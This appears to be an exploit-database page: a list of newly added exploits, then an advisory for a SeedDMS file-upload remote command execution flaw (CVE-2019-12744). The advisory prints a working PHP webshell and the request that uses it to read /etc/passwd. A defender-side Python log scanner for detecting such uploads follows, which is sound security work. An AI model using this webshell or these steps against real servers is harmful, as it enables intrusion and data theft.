
9 changes to exploits/shellcodes

GSearch 1.0.1.0 - Denial of Service (PoC)
Microsoft Windows - 'CmpAddRemoveContainerToCLFSLog' Arbitrary File/Directory Creation
Microsoft Windows Font Cache Service - Insecure Sections Privilege Escalation
dotProject 2.1.9 - SQL Injection
SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting
SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting
SeedDMS versions < 5.1.11 - Remote Command Execution
GrandNode 4.40 - Path Traversal / Arbitrary File Download
Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode

# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Log in to the application and add a document under any folder.
Step 2: For the document, choose a simple PHP backdoor file; any backdoor/webshell could be used.

PHP Backdoor Code:
<?php

if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}

?>

Step 3: After uploading the file, check the document id corresponding to the document.
Step 4: Go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in the browser.

Note: Here "data" and "1048576" are the default folders where the uploaded files are saved.
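
Added example (not part of the original advisory and not SeedDMS code): a defender-side check that scans web server access logs for requests reaching a script-typed file inside the default content store named in the note (data/1048576/<document_id>/). The combined log format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Extensions often mapped to the PHP handler (assumption; match your server config).
EXEC_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Default content layout from the advisory note: data/1048576/<document_id>/<file>
STORE_RE = re.compile(r"/data/1048576/(?P<doc>\d+)/(?P<name>[^/]+)", re.I)

# Request part of a common/combined log line: ip ... "METHOD target PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def find_store_execution(lines):
    """Return one record per request for a script-typed file in the content store."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        # Decode %-escapes first so "1%2Ephp" is compared as "1.php".
        s = STORE_RE.search(unquote(parts.path))
        if not s:
            continue
        # Check every dot-separated suffix: covers "1.PHP" and "1.php.jpg" names.
        suffixes = {p.lower() for p in s["name"].split(".")[1:]}
        if suffixes & EXEC_EXT:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "doc_id": s["doc"], "file": s["name"],
                         "status": int(m["status"]),
                         "has_query": bool(parts.query)})
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jun/2019:10:01:02 +0000] "GET /data/1048576/42/1.php?cmd=cat+/etc/passwd HTTP/1.1" 200 120',
    '203.0.113.7 - - [20/Jun/2019:10:01:09 +0000] "POST /data/1048576/42/1.PHP HTTP/1.1" 200 88',
    '198.51.100.4 - - [20/Jun/2019:10:02:00 +0000] "GET /out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [20/Jun/2019:10:03:00 +0000] "GET /data/1048576/43/1.pdf HTTP/1.1" 403 199',
    '203.0.113.7 - - [20/Jun/2019:10:04:00 +0000] "GET /data/1048576/44/1%2Ephtml HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in find_store_execution(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the web server served, and possibly executed, a file straight out of the document store, so the stored file for that document id should be inspected. The content directory should not be reachable or script-enabled through the web server at all.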